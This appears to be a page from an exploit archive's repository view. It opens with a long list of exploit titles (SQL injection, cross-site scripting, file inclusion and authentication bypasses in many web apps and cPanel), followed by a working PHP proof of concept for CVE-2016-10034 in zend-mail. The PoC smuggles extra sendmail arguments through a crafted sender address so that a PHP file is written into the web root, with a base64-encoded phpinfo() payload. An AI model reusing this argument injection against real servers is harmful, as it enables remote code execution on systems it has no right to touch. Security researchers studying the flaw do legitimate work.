c203af40e6
1 new exploits Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure pppBlog 0.3.8 - (randompic.php) System Disclosure pppBlog 0.3.8 - System Disclosure NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit NetRisk 1.9.7 - Remote Password Change Exploit netrisk 1.9.7 - Cross-Site Scripting / SQL Injection NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) MyForum 1.3 - (lecture.php id) SQL Injection MyForum 1.3 - 'lecture.php' SQL Injection MyForum 1.3 - (padmin) Local File Inclusion MyForum 1.3 - 'padmin' Parameter Local File Inclusion e107 Plugin alternate_profiles - 'id' SQL Injection MyKtools 2.4 - (langage) Local File Inclusion e107 Plugin alternate_profiles - 'id' Parameter SQL Injection MyKtools 2.4 - 'langage' Parameter Local File Inclusion questcms - Cross-Site Scripting / Directory Traversal / SQL Injection AIOCP 1.4 - 'poll_id' SQL Injection QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection AIOCP 1.4 - 'poll_id' Parameter SQL Injection PersianBB - 'iranian_music.php id' SQL Injection Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion PersianBB - 'id' Parameter SQL Injection Agares ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution Venalsur on-line Booking Centre - (OfertaID) Cross-Site Scripting / SQL Injection Pro Traffic One - 'poll_results.php id' SQL Injection Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection Pro Traffic One - 'poll_results.php' SQL Injection e107 Plugin lyrics_menu - 'lyrics_song.php l_id' SQL Injection e107 Plugin lyrics_menu - 'l_id' Parameter SQL Injection SFS EZ Adult Directory - 'Directory.php id' SQL Injection Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection cpanel 11.x - Cross-Site Scripting / Local File Inclusion SFS EZ Adult Directory - 'directory.php' SQL Injection Logz podcast CMS 1.3.1 - 'art' Parameter SQL Injection cPanel 11.x - Cross-Site Scripting / Local File Inclusion SFS EZ HotScripts-like Site - 'cid' SQL Injection SFS EZ HotScripts-like Site - 'cid' Parameter SQL Injection SFS EZ Hosting Directory - 'cat_id' SQL Injection SFS EZ Hosting Directory - 'cat_id' Parameter SQL Injection SFS EZ Home Business Directory - 'cat_id' SQL Injection SFS EZ Link Directory - 'cat_id' SQL Injection Adult Banner Exchange Website - (targetid) SQL Injection SFS EZ BIZ PRO - 'track.php id' SQL Injection SFS EZ Affiliate - 'cat_id' SQL Injection Article Publisher PRO 1.5 - (Authentication Bypass) SQL Injection SFS EZ Webring - (cat) SQL Injection SFS EZ Hot or Not - (phid) SQL Injection SFS EZ Software - 'id' SQL Injection SFS EZ Home Business Directory - 'cat_id' Parameter SQL Injection SFS EZ Link Directory - 'cat_id' Parameter SQL Injection Adult Banner Exchange Website - 'targetid' Parameter SQL Injection SFS EZ BIZ PRO - SQL Injection SFS EZ Affiliate - 'cat_id' Parameter SQL Injection Article Publisher PRO 1.5 - Authentication Bypass SFS EZ Webring - 'cat' Parameter SQL Injection SFS EZ Hot or Not - 'phid' Parameter SQL Injection SFS EZ Software - 'id' Parameter SQL Injection Article Publisher PRO - (userid) SQL Injection SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection SFS EZ Career - 'content.php topic' SQL Injection SFS EZ Top Sites - 'topsite.php ts' SQL Injection SFS EZ Webstore - (where) SQL Injection SFS EZ Pub Site - 'Directory.php cat' SQL Injection SFS EZ Gaming Cheats - 'id' SQL Injection Article Publisher PRO - 'userid' Parameter SQL Injection SFS EZ Auction - Blind SQL Injection SFS EZ Career - SQL Injection SFS EZ Top Sites - SQL Injection SFS EZ Webstore - 'where' Parameter SQL Injection SFS EZ Pub Site - SQL Injection SFS EZ Gaming Cheats - SQL Injection GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection YourFreeWorld Programs Rating - 'details.php id' SQL Injection GO4I.NET ASP Forum 1.0 - SQL Injection YourFreeWorld Programs Rating - SQL Injection Shahrood - 'ndetail.php id' Blind SQL Injection YourFreeWorld Downline Builder - 'id' SQL Injection YourFreeWorld Banner Management - 'id' SQL Injection YourFreeWorld Blog Blaster - 'id' SQL Injection YourFreeWorld Autoresponder Hosting - 'id' SQL Injection YourFreeWorld Forced Matrix Script - 'id' SQL Injection YourFreeWorld Short Url & Url Tracker - 'id' SQL Injection YourFreeWorld Viral Marketing - 'id' SQL Injection YourFreeWorld Scrolling Text Ads - 'id' SQL Injection YourFreeWorld Reminder Service - 'id' SQL Injection YourFreeWorld Classifieds Blaster - 'id' SQL Injection Shahrood - Blind SQL Injection YourFreeWorld Downline Builder - 'tr.php' SQL Injection YourFreeWorld Banner Management - SQL Injection YourFreeWorld Blog Blaster - 'tr.php' SQL Injection YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection YourFreeWorld Forced Matrix Script - SQL Injection YourFreeWorld Short Url & Url Tracker - SQL Injection YourFreeWorld Viral Marketing - SQL Injection YourFreeWorld Scrolling Text Ads - SQL Injection YourFreeWorld Reminder Service - SQL Injection YourFreeWorld Classifieds Blaster - SQL Injection Downline Goldmine Builder - 'tr.php id' SQL Injection Downline Goldmine Category Addon - 'id' SQL Injection YourFreeWorld Classifieds Hosting - 'id' SQL Injection YourFreeWorld URL Rotator - 'id' SQL Injection Downline Goldmine paidversion - 'tr.php id' SQL Injection Downline Goldmine newdownlinebuilder - 'tr.php id' SQL Injection YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection Maran PHP Shop - 'prod.php cat' SQL Injection Downline Goldmine Builder - SQL Injection Downline Goldmine Category Addon - SQL Injection YourFreeWorld Classifieds Hosting - SQL Injection YourFreeWorld URL Rotator - SQL Injection Downline Goldmine paidversion - SQL Injection Downline Goldmine newdownlinebuilder - SQL Injection YourFreeWorld Shopping Cart - Blind SQL Injection Maran PHP Shop - 'prod.php' SQL Injection 1st News - 'products.php id' SQL Injection 1st News - SQL Injection BosClassifieds - 'cat_id' SQL Injection BosClassifieds - 'cat_id' Parameter SQL Injection MatPo Link 1.2b - (view.php id) SQL Injection MatPo Link 1.2b - SQL Injection Apoll 0.7b - (Authentication Bypass) SQL Injection Apoll 0.7b - Authentication Bypass pppBlog 0.3.11 - (randompic.php) File Disclosure TBmnetCMS 1.0 - (index.php content) Local File Inclusion pppBlog 0.3.11 - File Disclosure TBmnetCMS 1.0 - Local File Inclusion WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection WEBBDOMAIN Post Card 1.02 - 'catid' Parameter SQL Injection nicLOR Puglia Landscape - 'id' Local File Inclusion nicLOR Puglia Landscape - Local File Inclusion Vibro-School-CMS - (nID) SQL Injection Vibro-School-CMS - 'nID' Parameter SQL Injection WEBBDOMAIN Petition 1.02/2.0/3.0 - (Authentication Bypass) SQL Injection WEBBDOMAIN Polls 1.01 - (Authentication Bypass) SQL Injection WEBBDOMAIN Quiz 1.02 - (Authentication Bypass) SQL Injection WEBBDOMAIN Webshop 1.02 - (Authentication Bypass) SQL Injection Simple Document Management System 1.1.4 - SQL Injection Authentication Bypass Tours Manager 1.0 - (cityview.php cityid) SQL Injection WEBBDOMAIN Post Card 1.02 - (Authentication Bypass) SQL Injection WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass WEBBDOMAIN Polls 1.01 - Authentication Bypass WEBBDOMAIN Quiz 1.02 - Authentication Bypass WEBBDOMAIN Webshop 1.02 - Authentication Bypass Simple Document Management System 1.1.4 - Authentication Bypass Tours Manager 1.0 - SQL Injection WEBBDOMAIN Post Card 1.02 - Authentication Bypass PHPX 3.5.16 - (news_id) SQL Injection Pre Podcast Portal - 'Tour.php id' SQL Injection PHPX 3.5.16 - 'news_id' Parameter SQL Injection Pre Podcast Portal - SQL Injection Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling Absolute Form Processor XE-V 1.5 - (Authentication Bypass) SQL Injection Absolute Form Processor XE-V 1.5 - Authentication Bypass MyForum 1.3 - (Authentication Bypass) SQL Injection MyForum 1.3 - Authentication Bypass Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account) cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account) Simple Document Management System (SDMS) - SQL Injection Simple Document Management System - SQL Injection Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail) cPanel 11.x - Cross-Site Request Forgery (Edit E-mail) PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting Cpanel 10 - Select.HTML Cross-Site Scripting cPanel 10 - Select.HTML Cross-Site Scripting CPanel 5-10 - SUID Wrapper Privilege Escalation cPanel 5-10 - SUID Wrapper Privilege Escalation AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting AIOCP 1.3.x - 'load_page' Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' SQL Injection AIOCP 1.3.x - 'cp_news.php' SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection AIOCP 1.3.x - 'cp_links.php' SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection AIOCP 1.3.x - 'cp_login.php' SQL Injection AIOCP 1.3.x - 'cp_users_online.php' SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection AIOCP 1.3.x - 'cp_links_search.php' SQL Injection CPanel 10 - DNSlook.HTML Cross-Site Scripting cPanel 10 - DNSlook.HTML Cross-Site Scripting CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities CPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting CPanel 11 - PassWDMySQL Cross-Site Scripting cPanel 11 - PassWDMySQL Cross-Site Scripting CPanel 10.9.1 - Resname Parameter Cross-Site Scripting cPanel 10.9.1 - Resname Parameter Cross-Site Scripting netRisk 1.9.7 - 'index.php' Remote File Inclusion NetRisk 1.9.7 - 'index.php' Remote File Inclusion YourFreeWorld Downline Builder Pro - 'id' Parameter SQL Injection YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting TBmnetCMS 1.0 - Cross-Site Scripting pppBLOG 0.3 - 'search.php' Cross-Site Scripting Zend Framework / zend-mail < 2.4.11 - Remote Code Execution
96 lines
2.2 KiB
PHP
Executable file
96 lines
2.2 KiB
PHP
Executable file
<?php
|
|
|
|
/*
|
|
|
|
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
|
|
zend-mail < 2.4.11
|
|
zend-mail < 2.7.2
|
|
|
|
Discovered/Coded by:
|
|
|
|
Dawid Golunski
|
|
https://legalhackers.com
|
|
|
|
Full Advisory URL:
|
|
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
|
|
|
|
Video PoC
|
|
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
|
|
|
|
|
|
Follow the feed for updates:
|
|
|
|
https://twitter.com/dawid_golunski
|
|
|
|
|
|
A simple PoC (working on Sendmail MTA)
|
|
|
|
It will inject the following parameters to sendmail command:
|
|
|
|
Arg no. 0 == [/usr/sbin/sendmail]
|
|
Arg no. 1 == [-t]
|
|
Arg no. 2 == [-i]
|
|
Arg no. 3 == [-r]
|
|
Arg no. 4 == [attacker\]
|
|
Arg no. 5 == [-oQ/tmp/]
|
|
Arg no. 6 == [-X/var/www/cache/phpcode.php]
|
|
Arg no. 7 == ["@email.com]
|
|
|
|
|
|
|
|
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
|
|
Note /var/www/cache must be writable by www-data web user.
|
|
|
|
The resulting file will contain the payload passed in the body of the msg:
|
|
|
|
09607 <<< Content-Type: text/html; charset=us-ascii
|
|
09607 <<<
|
|
09607 <<< <?php phpinfo(); ?>
|
|
09607 <<<
|
|
09607 <<<
|
|
09607 <<<
|
|
|
|
|
|
See the full advisory URL for the exploit details.
|
|
|
|
*/
|
|
|
|
|
|
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
|
|
// For example from a Contact form with sender field
|
|
|
|
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
|
|
// encoded phpinfo() php code
|
|
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
|
|
|
|
|
|
|
|
// ------------------
|
|
|
|
// mail() param injection via the vulnerability in zend-mail
|
|
|
|
|
|
chdir(dirname(__DIR__));
|
|
include 'vendor/Zend/Loader/AutoloaderFactory.php';
|
|
|
|
Zend\Loader\AutoloaderFactory::factory(array(
|
|
'Zend\Loader\StandardAutoloader' => array(
|
|
'autoregister_zf' => true
|
|
)
|
|
));
|
|
|
|
Zend\Mvc\Application::init(require 'config/application.php')->run();
|
|
|
|
$message = new \Zend\Mail\Message();
|
|
|
|
$message->setBody($msg_body);
|
|
$message->setFrom($email_from, 'Attacker');
|
|
$message->addTo('support@localhost', 'Support');
|
|
$message->setSubject('Zend PoC');
|
|
|
|
$transport = new \Zend\Mail\Transport\Sendmail();
|
|
$transport->send($message);
|
|
|
|
?>
|
|
|
|
|